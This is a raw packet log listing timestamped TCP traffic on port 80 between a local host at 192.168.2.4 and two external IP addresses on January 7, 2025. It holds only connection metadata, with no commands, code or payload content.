Jan 7, 2025 10:08:07.288897038 CET	80	49809	185.215.113.43	192.168.2.4
Jan 7, 2025 10:08:07.288990021 CET	49793	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:07.289031982 CET	49809	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:07.289242029 CET	49809	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:07.294060946 CET	80	49809	185.215.113.43	192.168.2.4
Jan 7, 2025 10:08:08.077176094 CET	80	49809	185.215.113.43	192.168.2.4
Jan 7, 2025 10:08:08.077189922 CET	80	49809	185.215.113.43	192.168.2.4
Jan 7, 2025 10:08:08.077210903 CET	80	49809	185.215.113.43	192.168.2.4
Jan 7, 2025 10:08:08.077224016 CET	80	49809	185.215.113.43	192.168.2.4
Jan 7, 2025 10:08:08.077258110 CET	49809	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:08.077305079 CET	49809	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:08.081094027 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.085994959 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.086086035 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.086257935 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.091027021 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.805921078 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.805943966 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.805958033 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.805969954 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.805980921 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.806057930 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.806070089 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.806067944 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.806082010 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.806094885 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.806111097 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.806133032 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.806164026 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.806202888 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.810885906 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.810898066 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.810959101 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.935815096 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.935853958 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.935877085 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.935874939 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.935919046 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.935919046 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.935945034 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.935957909 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.935991049 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.936295033 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.936309099 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.936321020 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.936341047 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.936364889 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.936367989 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.936414957 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.936850071 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.936863899 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.936877012 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.936891079 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.936914921 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.936927080 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.936932087 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.936969995 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.937443972 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.937455893 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.937468052 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.937566042 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.937578917 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.937593937 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.937593937 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.937616110 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.938335896 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.938349009 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.938360929 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.938378096 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.938399076 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.938412905 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.938446045 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.940766096 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.940792084 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.940829039 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.940836906 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:08.940851927 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:08.940869093 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.065984011 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.066015005 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.066025972 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.066118956 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.066168070 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.066178083 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.066190958 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.066203117 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.066215038 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.066219091 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.066232920 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.066235065 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.066260099 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.066274881 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.066279888 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.066293001 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.066313028 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.066333055 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.066353083 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.066365957 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.066379070 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.066386938 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.066410065 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.066417933 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.066451073 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.066761971 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.066800117 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.066812038 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.066822052 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.066845894 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.066865921 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.066871881 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.066881895 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.066894054 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.066901922 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.066917896 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.066936970 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.067054033 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.067065954 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.067078114 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.067091942 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.067102909 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.067120075 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.067370892 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.067384005 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.067394972 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.067409992 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.067431927 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.067433119 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.067444086 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.067456007 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.067466974 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.067467928 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.067485094 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.067512035 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.067595005 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.067609072 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.067620993 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.067631006 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.067632914 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.067645073 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.067646027 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.067663908 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.067687988 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.068218946 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.068231106 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.068243027 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.068258047 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.068262100 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.068274021 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.068280935 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.068286896 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.068298101 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.068304062 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.068332911 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.068413973 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.068428040 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.068439007 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.068448067 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.068450928 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.068463087 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.068475008 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.068500042 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:09.071124077 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:09.071175098 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:11.221113920 CET	49809	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:11.221401930 CET	49840	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:11.226171970 CET	80	49809	185.215.113.43	192.168.2.4
Jan 7, 2025 10:08:11.226190090 CET	80	49840	185.215.113.43	192.168.2.4
Jan 7, 2025 10:08:11.226249933 CET	49809	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:11.226278067 CET	49840	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:11.226418972 CET	49840	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:11.231242895 CET	80	49840	185.215.113.43	192.168.2.4
Jan 7, 2025 10:08:11.929605007 CET	80	49840	185.215.113.43	192.168.2.4
Jan 7, 2025 10:08:11.929661036 CET	49840	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:11.931925058 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:11.932501078 CET	49843	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:11.937144995 CET	80	49816	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:11.937199116 CET	49816	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:11.937244892 CET	80	49843	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:11.937303066 CET	49843	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:11.937875032 CET	49843	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:11.942647934 CET	80	49843	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:12.638807058 CET	80	49843	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:12.638827085 CET	80	49843	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:12.638839006 CET	80	49843	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:12.638883114 CET	49843	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:12.638912916 CET	49843	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:14.790704966 CET	49840	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:14.791265965 CET	49860	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:14.795825958 CET	80	49840	185.215.113.43	192.168.2.4
Jan 7, 2025 10:08:14.795909882 CET	49840	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:14.796124935 CET	80	49860	185.215.113.43	192.168.2.4
Jan 7, 2025 10:08:14.796221018 CET	49860	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:14.804812908 CET	49860	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:14.809675932 CET	80	49860	185.215.113.43	192.168.2.4
Jan 7, 2025 10:08:15.511986971 CET	80	49860	185.215.113.43	192.168.2.4
Jan 7, 2025 10:08:15.512088060 CET	49860	80	192.168.2.4	185.215.113.43
Jan 7, 2025 10:08:18.799496889 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:18.805814028 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:18.806813002 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:18.807509899 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:18.812261105 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.515887976 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.515911102 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.515923023 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.515942097 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.515954018 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.515980959 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.516038895 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.516040087 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.516053915 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.516068935 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.516076088 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.516081095 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.516103029 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.516122103 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.516146898 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.520865917 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.520899057 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.520908117 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.520979881 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.647808075 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.647825956 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.648721933 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.648735046 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.648746014 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.648758888 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.648803949 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.648848057 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.653453112 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.653466940 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.653538942 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.653687000 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.653701067 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.653743029 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.658248901 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.658263922 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.658452988 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.658464909 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.658483028 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.658524990 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.663029909 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.663052082 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.663157940 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.663227081 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.667831898 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.667845011 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.667857885 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.668081999 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.672610998 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.672629118 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.672688961 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.760092020 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.799117088 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799133062 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799145937 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799159050 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799170017 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799179077 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799185038 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799190998 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799181938 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.799196959 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799202919 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799213886 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799221039 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799227953 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799232960 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799238920 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799245119 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799252033 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799257040 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799263954 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799269915 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799269915 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.799344063 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.799344063 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.799854040 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799866915 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799879074 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799885988 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799896002 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799910069 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799911976 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.799921989 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799936056 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799945116 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.799948931 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799962044 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799968004 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.799968958 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799979925 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.799990892 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.800000906 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.800014019 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.800017118 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.800035954 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.800038099 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.800049067 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.800061941 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.800074100 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.800086975 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.800093889 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.800093889 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.800118923 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.800890923 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.800904989 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.800915956 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.800923109 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.800928116 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.800972939 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.801028967 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.801350117 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.804160118 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.804171085 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.804219961 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:19.891215086 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.891228914 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:19.894920111 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.016778946 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.016797066 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.016810894 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.016828060 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.016840935 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.016932964 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.017218113 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.017231941 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.017251015 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.017373085 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.017373085 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.017772913 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.017793894 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.017807007 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.017817974 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.017837048 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.017873049 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.018595934 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.018609047 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.018621922 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.018641949 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.018656969 CET	49884	80	192.168.2.4	185.215.113.16
